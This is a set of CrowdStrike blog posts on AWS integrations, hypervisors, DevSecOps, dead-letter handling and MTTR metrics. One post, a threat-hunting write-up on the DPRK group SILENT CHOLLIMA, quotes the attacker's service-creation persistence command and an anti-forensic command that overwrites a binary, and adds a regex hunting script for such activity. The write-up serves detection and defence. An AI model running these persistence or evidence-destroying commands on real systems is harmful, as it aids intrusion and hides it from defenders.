✇ CrowdStrike

CrowdStrike Announces Expanded Partnership at AWS re:Invent 2021

By: Shawn Wells

We’re ready to meet you in person in Las Vegas! CrowdStrike is a proud Gold sponsor of AWS re:Invent 2021, being held Nov. 29 through Dec. 3. Stop by Booth #152 at the Venetian for a chance to obtain one of our new limited-edition adversary figures while supplies last. (More details below.) Plus, connect 1:1 with a CrowdStrike expert in person. Register today so you don’t miss out on CrowdStrike in action! Check out what else we have to offer here.

Here’s a sneak peek.

What’s New 

At AWS re:Invent 2021, we are announcing expansions to our strategic partnership with AWS to provide breach protection and control for edge computing workloads running on cloud and customer-managed infrastructure, simplifying infrastructure management and consolidating security without impacting productivity. 

Build with AWS, Secure with CrowdStrike

AWS Outposts Rack (42U), AWS Outposts Servers (1U and 2U) 

CrowdStrike is proud to be a launch partner of AWS Outposts 1U and 2U servers and is now compatible with the AWS Outposts rack. AWS Outposts is a fully managed service that offers the same AWS infrastructure, AWS services, APIs and tools to on-premises data centers, co-location space, or edge locations like retail stores, branch offices, factories and office locations for a truly consistent hybrid experience. AWS Outposts is ideal for workloads that require low latency access to on-premises systems, local data processing, data residency and migration of applications with local system interdependencies. As a launch partner, CrowdStrike can provide complete end-to-end visibility and protection for a customer’s AWS hybrid environments as well as Internet of Things (IoT) and edge computing use cases.

CrowdStrike Achieves EKS Anywhere Certification

Amazon EKS Anywhere is a new deployment option for Amazon EKS that allows customers to create and operate Kubernetes clusters on customer-managed infrastructure, supported by AWS. Starting today, AWS customers can run Amazon EKS Anywhere on their own on-premises infrastructure using VMware vSphere. Now, with the Amazon EKS Anywhere certification, joint CrowdStrike and AWS solutions deliver end-to-end protection from the host to the cloud, delivering greater visibility, compliance, and threat detection and response to outsmart the adversary. CrowdStrike supports development and production of Amazon EKS workloads across Amazon EKS, Amazon EKS with AWS Fargate, and now Amazon EKS Anywhere.

Humio Log Management Integrations with AWS Services 

Humio’s purpose-built, large-scale log management platform is now more tightly integrated with a number of AWS services, including AWS Quick Starts and AWS FireLens.

  • AWS Quick Starts for Humio: AWS Quick Starts are automated reference deployments built by AWS solutions architects and AWS Partners. AWS Quick Starts help you deploy popular technologies on AWS according to AWS best practices. Joint customers will be able to launch Humio clusters via AWS Quick Start templates, reducing manual procedures to just a few steps so customers can attain Humio’s streaming observability at scale, and with consistency, within minutes.
  • Humio Integration with AWS FireLens: Customers are now able to ingest AWS service and event data into Humio via the AWS FireLens container log router for Amazon ECS and AWS Fargate. Humio customers can now use the breadth of AWS services to simplify log routing to Humio, enabling accelerated threat hunting and search across their AWS footprint for novel and advanced cyber threats.

AWS Security Hub Integration Now Supports AWS GovCloud 

CrowdStrike Falcon already integrates with AWS Security Hub to enable a comprehensive, real-time view of high-priority security alerts. CrowdStrike’s API-first approach sends alerts back into AWS Security Hub and accelerates investigation, ultimately helping to automate security tasks. 

We have now extended this integration to publish detections identified by CrowdStrike Falcon for workloads residing within AWS GovCloud to AWS Security Hub, assisting customers operating in highly regulated environments such as the U.S. public sector. This will allow customers’ security operations center (SOC) and DevOps teams to streamline communications and simultaneously view and access the same cybersecurity event data. 
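As a rough illustration of how a detection reaches Security Hub, findings are submitted in the AWS Security Finding Format (ASFF) via the `batch_import_findings` API. The sketch below is not CrowdStrike’s actual integration; the field values, generator ID and product ARN are illustrative placeholders.

```python
import datetime

def build_finding(detection_id, account_id, region, severity, title):
    """Shape a detection into an AWS Security Finding Format (ASFF) dict.
    Field values and the product ARN below are illustrative placeholders."""
    now = datetime.datetime.now(datetime.timezone.utc).isoformat()
    return {
        "SchemaVersion": "2018-10-08",
        "Id": detection_id,
        # GovCloud uses the aws-us-gov partition in ARNs.
        "ProductArn": f"arn:aws-us-gov:securityhub:{region}:{account_id}:product/{account_id}/default",
        "GeneratorId": "falcon-detections",
        "AwsAccountId": account_id,
        "Types": ["TTPs/Defense Evasion"],
        "CreatedAt": now,
        "UpdatedAt": now,
        "Severity": {"Label": severity},
        "Title": title,
        "Description": title,
        "Resources": [{"Type": "Other", "Id": detection_id}],
    }

# Publishing requires boto3 and GovCloud credentials, e.g.:
# import boto3
# securityhub = boto3.client("securityhub", region_name="us-gov-west-1")
# securityhub.batch_import_findings(Findings=[build_finding(...)])
```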

CrowdStrike and AWS Partnership 

CrowdStrike is an AWS Partner Network (APN) Advanced Technology Partner, part of a global partner program that provides AWS business, technical and marketing support to partners building solutions for customers. In addition, CrowdStrike has passed the technical review for the AWS Well-Architected ISV Certification. By achieving this certification, CrowdStrike has demonstrated adoption of AWS best practices that lower costs, improve security and performance, embrace cloud-native architectures, support industry compliance and scale to meet traffic demands. CrowdStrike product offerings are available in AWS Marketplace.

The Powerful Benefits of CrowdStrike and AWS 

Our joint solutions and integrations in various AWS services are powered by CrowdStrike Threat Graph®, which captures trillions of high-fidelity signals per day in real time from across the globe. Customers benefit from better protection, better performance and immediate time-to-value delivered by the cloud-native Falcon platform, designed to stop breaches. With over 14 service level integrations available, joint AWS and CrowdStrike customers are provided a consistent security posture between their on-premises workloads and those running in the AWS Cloud.

  • Unified, hybrid security experience: To reiterate, CrowdStrike supports development and production of Amazon EKS workloads across Amazon EKS, Amazon EKS with AWS Fargate, and Amazon EKS Anywhere. With a single lightweight agent and single management console, customers get a unified, end-to-end experience from the host to the cloud. No matter where the compute workloads are located, customers benefit from visibility, compliance, and threat detection and response to outsmart the adversary.
  • Real-time observability at enterprise scale: Humio offers the freedom to log hundreds of terabytes a day with no compromises. Now with the direct integration with AWS FireLens, customers have complete visibility to see anomalies, threats and problems to get to the root of anything nefarious that has happened across their AWS infrastructure in real time.
  • A modern and consistent security approach: The latest integrations, support and certifications from CrowdStrike for AWS allow organizations to implement a modern enterprise security approach where protection is provided across your AWS infrastructure to defend against sophisticated threat activity. 

Visit CrowdStrike at Booth #152

Come by Booth #152 for a chance to win your own adversary figure, engage in product demos and chat with CrowdStrike experts.

How to Obtain Your Own Adversary Figure 

Earn a limited-edition adversary collectible card for each step you complete. Then show your three collectible cards to a CrowdStrike representative at our giveaway station in the booth, and you’ll be rewarded with your very own adversary figure while supplies last! 

  1. Listen to a theater presentation at the CrowdStrike booth 
  2. Engage in a product demo at one of our demo stations
  3. Snap a selfie and tag #GoCrowdStrike (we will have adversary masks in the booth)

Meet 1:1 with a CrowdStrike Executive

CrowdStrike will have executives and leaders attending AWS re:Invent in person. If you’re interested in a 1:1 onsite meeting, please fill out the form here.

Questions? Please contact [email protected]. We look forward to seeing you at AWS re:Invent 2021!



What Is a Hypervisor (VMM)?

By: Humio Staff

This blog was originally published on humio.com. Humio is a CrowdStrike Company.

What is a hypervisor?

A hypervisor, or virtual machine monitor (VMM), is virtualization software that creates and manages multiple virtual machines (VMs) from a single physical host machine.

Acting as a VMM, the hypervisor monitors, pools and allocates resources — like CPU, memory and storage — across all guest VMs. By centralizing these assets, it’s possible to significantly reduce each VM’s energy consumption, space allocation and maintenance requirements while optimizing overall system performance.

Why should you use a hypervisor?

In addition to helping the IT team better monitor and utilize all available resources, a hypervisor unlocks a wide range of benefits. These include:

  • Speed and scalability: Hypervisors can create new VMs instantly, which allows organizations to quickly scale to meet changing business needs. In the event an application needs more processing power, the hypervisor can also access additional machines on a different server to address this demand.
  • Cost and energy efficiency: Using a hypervisor to create and run several VMs from a common host is far more cost- and energy-efficient than running several physical machines to complete the same tasks.
  • Flexibility: A hypervisor separates the OS from underlying physical hardware. As a result, the guest VM can run a variety of software and applications since the system does not rely on specific hardware.
  • Mobility and resiliency: Hypervisors logically isolate VMs from the host hardware. VMs can therefore be moved freely from one server to another without risk of disruption. Hypervisors can also isolate one guest virtual machine from another; this eliminates the risk of a “domino effect” if one virtual machine crashes.
  • Replication: Replicating a VM manually is a time-intensive and potentially complex process. Hypervisors automate the replication process for VMs, allowing staff to focus on more high-value tasks.
  • Restoration: A hypervisor has built-in stability and security features, including the ability to take a snapshot of a VM’s current state. Once this snapshot is taken, the VM can revert to this state if needed. This is particularly useful when carrying out system upgrades or maintenance as the VM can be restored to its previous functioning state if the IT team encounters an error.

Types of hypervisors

There are two main types of hypervisors:

  1. Type 1 hypervisor: Native or bare metal hypervisor
  2. Type 2 hypervisor: Hosted or embedded hypervisor

Type 1 hypervisor: native or bare metal hypervisor

A type 1 hypervisor installs virtualization software directly on the hardware, hence the name bare metal hypervisor.

In this model, the hypervisor takes the place of the OS. As a result, these hypervisors are typically faster since all computing power can be dedicated to guest virtual machines, as well as more secure since adversaries cannot target vulnerabilities within the OS.

That said, a native hypervisor tends to be more complex to set up and operate. Further, a type 1 hypervisor has somewhat limited functionality since the hypervisor itself basically serves as an OS.

Type 2 hypervisor: hosted or embedded hypervisor

Unlike bare-metal hypervisors, a hosted hypervisor is deployed as an added software layer on top of the host operating system. Multiple operating systems can then be installed as a new layer on top of the host OS.

In this model, the OS acts as a way station between the hardware and the hypervisor. As a result, a type 2 hypervisor tends to have higher latency and slower performance. The presence of the OS also makes this type more vulnerable to cyberattacks.

Embedded hypervisors are generally more convenient to build and launch than a type 1 hypervisor since they do not require a management console or dedicated machine to set up and oversee the VMs. A hosted hypervisor may also be a good choice for use cases where latency is not a concern, such as software testing.

Cloud hypervisors

The shift to the cloud and cloud computing is prompting the need for cloud hypervisors. The cloud hypervisor focuses exclusively on running VMs in a cloud environment (rather than on physical devices).

Due to the cloud’s flexibility, speed and cost savings, businesses are increasingly migrating their VMs to the cloud. A cloud hypervisor provides the tools to migrate them more efficiently, allowing companies to realize a faster return on investment on their transformation efforts.

Differences between containers and hypervisors

Containers and hypervisors both ensure applications run more efficiently by logically isolating them within the system. However, there are significant differences between how the two are structured, how they scale and their respective use cases.

A container is a package containing only an application and its dependencies, such as code, system tools, settings and libraries. It can run reliably on any operating system and infrastructure. A container consists of an entire runtime environment, enabling applications to move between a variety of computing environments, such as from a physical machine to the cloud, or from a developer’s test environment to staging and then production.

Hypervisors vs containers

Hypervisors host one or more VMs that mimic a collection of physical machines. Each VM has its own independent OS and is effectively isolated from others.

While VMs are larger and generally slower compared to containers, they can run several applications and different operating systems simultaneously. This makes them a good solution for organizations that need to run multiple applications or legacy software that requires an outdated OS.

Containers, on the other hand, often share an OS kernel or base image. While each container can run individual applications or microservices, it is still linked to the underlying kernel or base image.

Containers are typically used to host a single app or microservice without any other overhead. This makes them more lightweight and flexible than VMs. As such, they are often used for tasks that require a high level of scalability, portability and speed, such as application development.

Understanding hypervisor security

On one hand, by isolating VMs from one another, a hypervisor effectively contains attacks on an individual VM. Also, in the case of type 1 or bare metal hypervisors, the absence of an operating system significantly reduces the risk of an attack since adversaries cannot exploit vulnerabilities within the OS.

At the same time, the hypervisor host itself can be subject to an attack. In that case, each guest machine and their associated data could be vulnerable to a breach.

Best practices for improving hypervisor security

Here are some best practices to consider when integrating a hypervisor within the organization’s IT architecture:

  • Minimize the attack surface by limiting a host’s role to only operating VMs
  • Conduct regular and timely patching for all software applications and the OS
  • Leverage other security measures, such as encryption, zero trust and multi-factor authentication (MFA) to ensure user credentials remain secure
  • Limit administrative privileges and the number of users in the system
  • Incorporate the hypervisor within the organization’s cybersecurity architecture for maximum protection

Hypervisors and modern log management

With the growth of microservices and migration to disparate cloud environments, maintaining observability has become increasingly difficult. Challenges such as application availability, bugs and vulnerabilities, resource use, and performance changes in virtual machines and containers continue to affect the end-user experience. Organizations operating with a continuous delivery model are further troubled with capturing and understanding the dependencies within the application environment.

Humio’s streaming log management solution can access and ingest real-time data streaming from diverse platforms and accurately log network issues, database connections and availability, and information about what’s happening in a container that the application relies on. In addition to gaining visibility across the entire infrastructure, developers benefit from comprehensive root cause investigation and analysis. Humio enables search across all relevant data, with longer data retention and long-term storage.

Humio Community Edition

Try Humio’s log management solution at no cost with ongoing access here!


Nowhere to Hide: Detecting SILENT CHOLLIMA’s Custom Tooling

By: Falcon OverWatch Team

CrowdStrike Falcon OverWatch™ recently released its annual threat hunting report, detailing the interactive intrusion activity observed by hunters over the course of the past year. The tactics, techniques and procedures (TTPs) an adversary uses serve as key indicators to threat hunters of who might be behind an intrusion. OverWatch threat hunters uncovered an intrusion against a pharmaceuticals organization that bore all of the hallmarks of a Democratic People’s Republic of Korea (DPRK) threat actor group: SILENT CHOLLIMA. For further detail, download the CrowdStrike 2021 Threat Hunting Report today.

Threat Hunters Uncover SILENT CHOLLIMA’s Custom Tooling

OverWatch threat hunters detected a burst of suspicious reconnaissance activity in which the threat actor used the Smbexec tool under a Windows service account. Originally designed as a penetration testing tool, Smbexec enables covert execution by creating a Windows service that is then used to redirect a command shell operation to a remote location over Server Message Block (SMB) protocol. This approach is valuable to threat actors, as they can perform command execution under a semi-interactive shell and run commands remotely, ultimately making the activity less likely to trigger automated detections.

As OverWatch continued to investigate the reconnaissance activity, the threat actor used Smbexec to remotely copy low-prevalence executables to disk and execute them. The threat hunters called on CrowdStrike Intelligence, and together the teams quickly determined the files were an updated variant of Export Control, a malware dropper unique to SILENT CHOLLIMA.

SILENT CHOLLIMA then proceeded to load two further custom tools. The first was an information stealer, named GifStealer, which runs a variety of host and network reconnaissance commands and archives the output within individual compressed files. The second was Valefor, a remote access tool (RAT) that uses Windows API functions and utilities to enable file transfer and data collection capabilities.

OverWatch Contains Adversary Activity

Throughout the investigation, OverWatch threat hunters alerted the victim organization to the malicious activity occurring in the environment. As the situation developed, OverWatch continued to alert the organization, eventually informing them of the emerging attribution of this activity to SILENT CHOLLIMA. 

Because this activity originated from a host without the CrowdStrike Falcon® sensor, OverWatch next worked with the organization to expand the rollout of the Falcon sensor so the full scope of threat actor activity could be assessed. Increasing the organization’s coverage and visibility into the intrusion, threat hunters identified six additional compromised hosts. Through further collaboration with the organization, OverWatch was able to relay their findings in a timely manner, empowering the organization to contain and remove SILENT CHOLLIMA from their network. 

OverWatch discovered a service creation event that was configured to execute the Export Control loader every time the system reboots, allowing the threat actor to maintain persistence if they temporarily lose connection.

sc create [REDACTED] type= own type= interact start= auto error= ignore binpath= "cmd /K start C:\Windows\Resources\[REDACTED].exe"

The threat actor was also mindful to evade detection, storing the Export Control droppers and archived reconnaissance data within legitimate local directories in an attempt to make the files appear benign. The threat actor continued these evasion techniques by removing traces of the collected GifStealer archives, deleting them and overwriting the GifStealer binary itself using the command below. This technique is another hallmark of SILENT CHOLLIMA activity.

"C:\Windows\system32\cmd.exe" /c ping -n 3 >NUL & echo EEEE > "C:\Windows\Temp\[REDACTED]"

Conclusions and Recommendations

The OverWatch team exposed multiple signs of malicious tradecraft in the early stages of this intrusion, which proved to be vital to the victim organization’s ability to successfully contain the campaign and remove the threat actor from its networks. In this instance, OverWatch worked with the organization to rapidly expand Falcon sensor coverage. Though the Falcon sensor can be deployed and operational in just seconds, OverWatch strongly recommends that defenders roll out endpoint protection consistently and comprehensively across their environment from the start to ensure maximum coverage and visibility for threat hunters. OverWatch routinely sees security blind spots become a safe haven from which adversaries can launch their intrusions.  The Falcon sensor was built with scalability in mind, allowing an organization to reach a strong security posture by protecting all enterprise endpoints in mere moments.

The expertise of OverWatch’s human threat hunters was pivotal in this instance, as it was their expertise that allowed them to discern that the SMB activity was indeed malicious. 

For defenders concerned about this type of activity, OverWatch recommends monitoring: 

  • Service account activity, limiting access where possible
  • Service creation events within Windows event logs to hunt for malicious SMB commands
  • Remote users connecting to administrator shares, as well as other commands and tools that can be used to connect to network shares
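The second of these recommendations can be sketched as a simple hunt over parsed Windows service-creation records (System log event 7045, Security log event 4697). The event shape and the two patterns below are assumptions to tune for your own environment, not a CrowdStrike detection rule.

```python
import re

# Patterns that often appear when a tool like Smbexec creates a service to
# redirect a shell over SMB; both are assumptions to tune per environment.
SUSPICIOUS_PATTERNS = [
    re.compile(r"cmd(\.exe)?\s*/[KkCc]"),    # shell spawned via cmd /K or /C
    re.compile(r"\\\\[\w.]+\\[A-Za-z]+\$"),  # output redirected to an admin share
]

def flag_service_events(events):
    """events: iterable of dicts parsed from Windows service-creation
    records (System log event 7045, Security log event 4697)."""
    hits = []
    for event in events:
        if event.get("event_id") not in (7045, 4697):
            continue
        image_path = event.get("image_path", "")
        if any(p.search(image_path) for p in SUSPICIOUS_PATTERNS):
            hits.append(event)
    return hits

sample = [
    {"event_id": 7045, "image_path": "cmd /K start C:\\Windows\\Resources\\x.exe"},
    {"event_id": 7045, "image_path": "C:\\Windows\\System32\\svchost.exe -k netsvcs"},
]
print(len(flag_service_events(sample)))  # prints 1
```

The first sample record mirrors the persistence command shown earlier and is flagged; the second is an ordinary service and passes.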

Ultimately, threat hunting is a full-time job. Defenders should also consider hiring a professional managed threat hunting service, like OverWatch, to secure their networks 24/7/365. 



Shift Left Security: The Magic Elixir for Securing Cloud-Native Apps

By: David Puzas

Developing applications quickly has always been the goal of development teams. Traditionally, that often puts them at odds with the need for testing. Developers might code up to the last minute, leaving little time to find and fix vulnerabilities in time to meet deadlines. 

During the past decade, this historical push-pull between security and developers led many organizations to look to build security deeper into the application development lifecycle. This new approach, “shift-left security,” is a pivotal part of supporting the DevOps methodology. By focusing on finding and remediating vulnerabilities earlier, organizations can streamline the development process and improve velocity. 

Cloud computing empowers the adoption of DevOps. It offers DevOps teams a centralized platform for testing and deployment. But for DevOps teams to embrace the cloud, security has to be at the forefront of their considerations. For developers, that means making security a part of the continuous integration/continuous delivery (CI/CD) pipeline that forms the cornerstone of DevOps practices.

Out with the Old and In with the New

The CI/CD pipeline is vital to supporting DevOps through the automation of building, testing and deploying applications. It is not enough to just scan applications after they are live. A shift-left approach to security should start the same second that DevOps teams begin developing the application and provisioning infrastructure. By using APIs, developers can integrate security into their toolsets and enable security teams to find problems early. 

Speedy delivery of applications is not the enemy of security, though it can seem that way. Security is meant to be an enabler, an elixir that helps organizations use technology to reach their business goals. Making that a reality, however, requires making it a foundational part of the development process. 

In our Buyer’s Guide for Cloud Workload Protection Platforms, we provide a list of key features we believe organizations should look for to help secure their cloud environments. Automation is crucial. In research from CrowdStrike and Enterprise Strategy Group (ESG), 41% of respondents said that automating the introduction of controls and processes via integration with the software development lifecycle and CI/CD tools is a top priority. Using automation, organizations can keep pace with the elastic, dynamic nature of cloud-native applications and infrastructure.

Better Security, Better Apps

At CrowdStrike, we focus on integrating security into the CI/CD pipeline. As part of the functionality of CrowdStrike’s Falcon Cloud Workload Protection (CWP), customers have the ability to create verified image policies to ensure that only approved images are allowed to progress through the CI/CD pipeline and run in their hosts or Kubernetes clusters. 
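The idea behind a verified image policy can be illustrated generically. The sketch below is not Falcon CWP’s API; it is a hypothetical, fail-closed digest allowlist check that a CI step might run before promoting an image, with made-up digests and tags.

```python
# Hypothetical digests; a real allowlist would be generated by your
# image-verification tooling and fetched from a trusted store.
APPROVED_DIGESTS = {
    "sha256:aaaa1111": "payments-api:1.4.2",
    "sha256:bbbb2222": "payments-api:1.4.1",
}

def image_allowed(image_digest, approved=APPROVED_DIGESTS):
    """Fail closed: only images whose content digest was explicitly
    approved may progress to the next pipeline stage."""
    return image_digest in approved

# A CI step would call this and abort the build when it returns False:
print(image_allowed("sha256:aaaa1111"), image_allowed("sha256:deadbeef"))  # prints: True False
```

Keying on the content digest rather than the tag matters: tags are mutable, digests are not.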

The tighter the integration between security and the pipeline, the earlier threats can be identified, and the more the speed of delivery can be accelerated. By seamlessly integrating with Jenkins, Bamboo, GitLab and others, Falcon CWP allows DevOps teams to respond and remediate incidents even faster within the toolsets they use. 

Falcon CWP also continuously scans container images for known vulnerabilities, configuration issues, secrets/keys and OSS licensing issues, and streamlines visibility for security operations by providing insights and context for misconfigurations and compliance violations. It also uses reporting and dashboards to drive alignment across the security operations, DevOps and infrastructure teams. 

Hardening the CI/CD pipeline allows DevOps teams to move fast without sacrificing security. The automation and integration of security into the CI/CD pipeline transforms the DevOps culture into its close relative, DevSecOps, which extends the methodology of DevOps by focusing on building security into the process. As businesses continue to adopt cloud services and infrastructure, forgetting to keep security top of mind is not an option. The CI/CD pipeline represents an attractive target for threat actors. Its criticality means that a compromise could have a significant impact on business and IT operations. 

Baking security into the CI/CD pipeline enables businesses to pursue their digital initiatives with confidence and security. By shifting security left, organizations can identify misconfigurations and other security risks before they impact users. Given the role that cloud computing plays in enabling DevOps, protecting cloud environments and workloads will only take on a larger role in defending the CI/CD pipeline, your applications and, ultimately, your customers. 

To learn more about how to choose security solutions to protect your CI/CD pipeline, download the CrowdStrike Cloud Workload Protection Platform Buyer’s Guide.



Managing Dead Letter Messages: Three Best Practices to Effectively Capture, Investigate and Redrive Failed Messages

By: Chris Cannon

In a recent blog post, Sharding Kafka for Increased Scale and Reliability, the CrowdStrike Site Reliability Engineering Team shared how it overcame scaling limitations within Apache Kafka so that it could quickly and effectively process trillions of events daily. In this post, we focus on the other side of this equation: What happens when one of those messages inevitably fails? 

When a message cannot be processed, it becomes what is known as a “dead letter.” The service attempts to process the message by normal means several times to eliminate intermittent failures. However, when all of those attempts fail, the message is ultimately “dead lettered.” In highly scalable systems, these failed messages must be dealt with so that processing can continue on subsequent messages. To retain the dead letter’s information and continue processing messages, the message is stored so that it can be later addressed manually or by an automated tool.
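The retry-then-dead-letter flow described above can be sketched in a few lines of Python. The handler, the storage callback and the error type here are hypothetical stand-ins for your real message processor and dead letter store.

```python
def process_with_retry(message, handler, store_dead_letter, max_attempts=3):
    """Attempt the handler several times to ride out intermittent failures;
    when every attempt fails, persist the message as a dead letter so
    processing of subsequent messages can continue."""
    last_error = None
    for _ in range(max_attempts):
        try:
            return handler(message)
        except Exception as exc:  # in production, catch narrower error types
            last_error = exc
    store_dead_letter(message, reason=str(last_error))
    return None

def always_fails(message):
    raise ValueError("incompatible message format")

dead = []
process_with_retry({"id": 1}, always_fails,
                   lambda msg, reason: dead.append((msg, reason)))
print(dead)  # [({'id': 1}, 'incompatible message format')]
```

The key property is that a poison message ends up recorded with its failure reason instead of blocking the stream.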

In Best Practices: Improving Fault-Tolerance in Apache Kafka Consumer, we go into great detail about the different failure types and techniques for recovery, which include redriving and dead letters. Here our aim is to solidify those terms and expound upon the processes surrounding these mechanisms. 

Processing dead letters can be a fairly time-consuming and error-prone process. So what can be done to expedite this task and improve its outcome? Here we explore three steps organizations can take to develop the code and infrastructure needed to more effectively and efficiently capture, investigate and redrive dead letter messages.

Dead Letter Basics

  • What is a message? A message is the record of any communication between two or more services.
  • Why does a message fail? Messages can fail for a variety of reasons; some of the most common are an incompatible message format, unavailable dependent services, or a bug in the service processing the message.
  • Why does it matter if a message fails? In most cases, a message is sent because it shares important information with another service. Without that knowledge, the receiving service can have outdated or inaccurate information and make bad decisions, or be completely unable to act.

Three Best Practices for Resolving Dead Letter Messages

1. Define the infrastructure and code to capture and redrive dead letters

As explained above, a dead letter occurs when a service cannot process a message. Most systems have some mechanism in place, such as a log or object storage, to capture the message, review it, identify the issue, resolve the issue and then retry the message once it’s more likely to succeed. This act of replaying the message is known as “redriving.” 

To enable the redrive process, organizations need two basic things: 1) the necessary infrastructure to capture and store the dead letter messages, and 2) the right code to redrive that message.

Since there could potentially be hundreds of millions of dead letters that need to be stored, we recommend using a storage option that meets these four criteria: low cost (especially critical as your data scales), abundant space (no concerns around running out of storage space), durability (no data loss or corruption) and availability (the data is available to restore during disaster recovery). We use Amazon S3. 

For short-term storage and alerting, we recommend using a message queue technology that allows the user to send messages to be processed at a later point. Then your service can be configured to read from the message queue to begin processing the redrive messages. We use Amazon SQS and Kafka as our message queues.
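A minimal sketch of this capture step, assuming S3 for durable storage and SQS for the redrive queue. The bucket layout, client wiring and message shape are illustrative, not CrowdStrike’s implementation; the `put_object` and `send_message` calls are the standard boto3 APIs.

```python
import json

def dead_letter_key(topic, day, message_id):
    # Partition by topic and date so dead letters stay browsable at scale
    # and can be expired with simple lifecycle rules.
    return f"dead-letters/{topic}/{day}/{message_id}.json"

def capture_dead_letter(s3, sqs, bucket, queue_url, topic, day, message):
    """Persist the failed message durably in S3, then notify the redrive
    queue with a small pointer record rather than the full payload."""
    key = dead_letter_key(topic, day, message["id"])
    s3.put_object(Bucket=bucket, Key=key, Body=json.dumps(message).encode())
    sqs.send_message(QueueUrl=queue_url,
                     MessageBody=json.dumps({"bucket": bucket, "key": key}))
    return key

# With real clients:
# import boto3
# capture_dead_letter(boto3.client("s3"), boto3.client("sqs"),
#                     "dead-letter-bucket", queue_url, "detections",
#                     "2021-11-29", failed_message)
```

Sending a pointer rather than the payload keeps the queue message small and leaves S3 as the single source of truth.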

2. Put tooling in place to make remediation foolproof 

The process outlined above can be very error-prone when done manually, as it involves many steps: finding the message, copying its contents, pasting it into a new message and submitting that message to the queue. If the user misses even one character when copying the message, then it will fail again — and the process will need to be repeated. This process must be done for every failed message, making it potentially time-consuming as well. 

Since the process is the same for every dead letter, it is possible to automate. To that end, organizations should develop a command-line tool that automates common actions on dead letters, such as viewing the dead letter, putting the message in the redrive queue and having the service consume messages from the queue for reprocessing. Engineers will use this command-line tool to diagnose and resolve dead letters the same way, which in turn will help reduce the risk of human error.
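Such a tool might expose one subcommand per action. This argparse skeleton is a hypothetical sketch (the `dlq` name, subcommands and defaults are assumptions), with the actual storage and queue plumbing omitted.

```python
import argparse

def build_parser():
    # Subcommands mirror the workflow: inspect a dead letter, then redrive it.
    parser = argparse.ArgumentParser(prog="dlq")
    subcommands = parser.add_subparsers(dest="command", required=True)

    view = subcommands.add_parser("view", help="print a stored dead letter")
    view.add_argument("message_id")

    redrive = subcommands.add_parser(
        "redrive", help="submit a dead letter for reprocessing")
    redrive.add_argument("message_id")
    redrive.add_argument("--queue", default="redrive-queue")
    return parser

args = build_parser().parse_args(["redrive", "msg-42", "--queue", "retry"])
print(args.command, args.message_id, args.queue)  # prints: redrive msg-42 retry
```

Because every engineer goes through the same two subcommands, there is no hand-copying of message bodies and therefore no transcription errors.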

3. Standardize and document the process to ensure ease-of-use 

Our third best practice is around standardization. Because not all engineers will be familiar with the process the organization has for dealing with dead letter messages, it is important to document all aspects of the procedure. Some basic questions your documentation should address include: 

  • How does the organization know when a dead letter message occurs? Is an alert set up? Will an email be sent?
  • How does the team investigate the root cause of the error? Is there a specific phrase they can search for in the logs to find the errors associated with a dead letter?
  • Once it has been investigated and a fix has been deployed, how is the message reprocessed or redrived?

Documenting and standardizing the process in this way ensures that anyone on the team can pick up, solve and redrive dead letters. Ideally, the documentation will be relatively short and intuitive, outlining the following steps:

  • How to read the content of the message and review the logs to help figure out what happened
  • How to run the commands for your dead letter tool
  • How to put the message in the redrive queue to be reprocessed
  • What to do if the message is rejected again

It’s important to have this “cradle-to-grave” mentality when dealing with dead letter messages — pun intended — since a disconnect anywhere within the process could prevent the organization from successfully reprocessing the message.


While many organizations focus on processing massive amounts of messages and scaling those capabilities, it is equally important to ensure errors are captured and solved efficiently and effectively. 

In this blog, we shared our three best practices for organizations to develop the infrastructure and tooling to ensure that any engineer can properly manage a dead letter. But we certainly have more to share! We would be happy to address any specific questions or explore related topics of interest to the community in future blog posts. 

Got a question, comment or idea? Feel free to share your thoughts for future posts on social media via @CrowdStrike.

✇ CrowdStrike

Mean Time to Repair (MTTR) Explained

By: Humio Staff

This blog was originally published Oct. 28, 2021 on humio.com. Humio is a CrowdStrike Company.

Definition of MTTR

Mean time to repair (MTTR) is a key performance indicator (KPI) that represents the average time required to restore a system to functionality after an incident. MTTR is used along with other incident metrics to assess the performance of DevOps and ITOps, gauge the effectiveness of security processes, evaluate the effectiveness of security solutions, and measure the maintainability of systems.

Service level agreements with third-party providers typically set expectations for MTTR, although repair times are not guaranteed because some incidents are more complex than others. Along the same lines, comparing the MTTR of different organizations is not fruitful because MTTR is highly dependent on unique factors relating to the size and type of the infrastructure and the size and skills of the ITOps and DevOps teams. Every business has to determine which metrics will best serve its purposes and how it will put them into action in its unique environment.

Difference Between Common Failure Metrics

Modern enterprise systems are complicated and they can fail in numerous ways. For these reasons, there is no one set of incident metrics every business should use — but there are many to choose from, and the differences can be nuanced.

Mean Time to Detect (MTTD)

Also called mean time to discover, MTTD is the average time between the beginning of a system failure and its detection. As a KPI, MTTD is used to measure the effectiveness of the tools and processes used by DevOps teams.

To calculate MTTD, select a period of time, such as a month, and track the times between the beginning of system outages and their discovery; then add up the total time and divide it by the number of incidents to find the average. MTTD should be low. If it takes progressively longer to detect or discover system failures (an upward trend), an immediate review should be conducted of the existing incident response management tools and processes.

Mean Time to Identify (MTTI)

This measurement tracks the number of business hours between the moment an alert is triggered and the moment the cybersecurity team begins to investigate that alert. MTTI is helpful in understanding if alert systems are effective and if cybersecurity teams are staffed to the necessary capacity. A high MTTI or an MTTI that is trending in the wrong direction can be an indicator that the cybersecurity team is suffering from alert fatigue.

Mean Time to Recovery (MTTR)

Mean time to recovery is the average time it takes in business hours between the start of an incident and the complete recovery back to normal operations. This incident metric is used to understand the effectiveness of the DevOps and ITOps teams and identify opportunities to improve their processes and capabilities.

Mean Time to Resolve (MTTR)

Mean time to resolve is the average time between the first alert through the post-incident analysis, including the time spent ensuring the failure will not re-occur. It is measured in business hours.

Mean Time Between Failures (MTBF)

Mean time between failures is a key performance metric that measures system reliability and availability. ITOps teams use MTBF to understand which systems or components are performing well and which need to be evaluated for repair or replacement. Knowing MTBF enables preventative maintenance, minimizes reactive maintenance, reduces total downtime and enables teams to prioritize their workload effectively. Historical MTBF data can be used to make better decisions about scheduling maintenance downtime and resource allocation.

MTBF is calculated by tracking the number of hours that elapse between system failures in the ordinary course of operations over a period of time and then finding the average.

Mean Time to Failure (MTTF)

Mean time to failure is a way of looking at uptime vs. downtime. Unlike MTBF, an incident metric that focuses on repairability, MTTF focuses on failures that cannot be repaired. It is used to predict the lifespan of systems. MTTF is not a good fit for every system. For example, systems with long lifespans, such as core banking systems or many industrial control systems, are not good subjects for MTTF metrics because they have such a long lifespan that when they are finally replaced, the replacement will be an entirely different type of system due to technological advances. In cases like that, MTTF is moot.

